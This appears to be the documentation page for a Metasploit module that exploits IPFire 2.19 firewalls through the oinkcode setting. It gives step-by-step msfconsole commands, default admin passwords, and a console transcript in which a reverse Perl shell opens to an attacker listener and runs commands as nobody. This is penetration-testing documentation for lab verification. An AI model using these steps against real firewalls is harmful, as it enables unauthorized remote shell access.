48 lines
1.5 KiB
Markdown
48 lines
1.5 KiB
Markdown
|
## Vulnerable Application
|
||
|
|
|
||
|
|
Official Source: [ipfire](http://downloads.ipfire.org/releases/ipfire-2.x/2.19-core110/ipfire-2.19.x86_64-full-core110.iso)
|
||
|
|
|
||
|
|
This module has been verified against:
|
||
|
|
|
||
|
|
1. 2.19 core 100
|
||
|
|
2. 2.19 core 110 (exploit-db, not metasploit module)
|
||
|
|
|
||
|
|
## Verification Steps
|
||
|
|
|
||
|
|
1. Install the firewall
|
||
|
|
2. Start msfconsole
|
||
|
|
3. Do: ```use exploit/linux/http/ipfire_oinkcode_exec```
|
||
|
|
4. Do: ```set password admin``` or whatever it was set to at install
|
||
|
|
5. Do: ```set rhost 10.10.10.10```
|
||
|
|
6. Do: ```set payload cmd/unix/reverse_perl```
|
||
|
|
7. Do: ```set lhost 192.168.2.229```
|
||
|
|
8. Do: ```exploit```
|
||
|
|
9. You should get a shell.
|
||
|
|
|
||
|
|
## Options
|
||
|
|
|
||
|
|
**PASSWORD**
|
||
|
|
|
||
|
|
Password is set at install. May be blank, 'admin', or 'ipfire'.
|
||
|
|
|
||
|
|
## Scenarios
|
||
|
|
|
||
|
|
```
|
||
|
|
msf > use exploit/linux/http/ipfire_oinkcode_exec
|
||
|
|
msf exploit(ipfire_oinkcode_exec) > set password admin
|
||
|
|
password => admin
|
||
|
|
msf exploit(ipfire_oinkcode_exec) > set rhost 192.168.2.201
|
||
|
|
rhost => 192.168.2.201
|
||
|
|
msf exploit(ipfire_oinkcode_exec) > set verbose true
|
||
|
|
verbose => true
|
||
|
|
msf exploit(ipfire_oinkcode_exec) > check
|
||
|
|
[*] 192.168.2.201:444 The target appears to be vulnerable.
|
||
|
|
msf exploit(ipfire_oinkcode_exec) > exploit
|
||
|
|
|
||
|
|
[*] Started reverse TCP handler on 192.168.2.117:4444
|
||
|
|
[*] Command shell session 1 opened (192.168.2.117:4444 -> 192.168.2.201:38412) at 2017-06-14 21:12:21 -0400
|
||
|
|
id
|
||
|
|
uid=99(nobody) gid=99(nobody) groups=99(nobody),16(dialout),23(squid)
|
||
|
|
whoami
|
||
|
|
nobody
|
||
|
|
```
|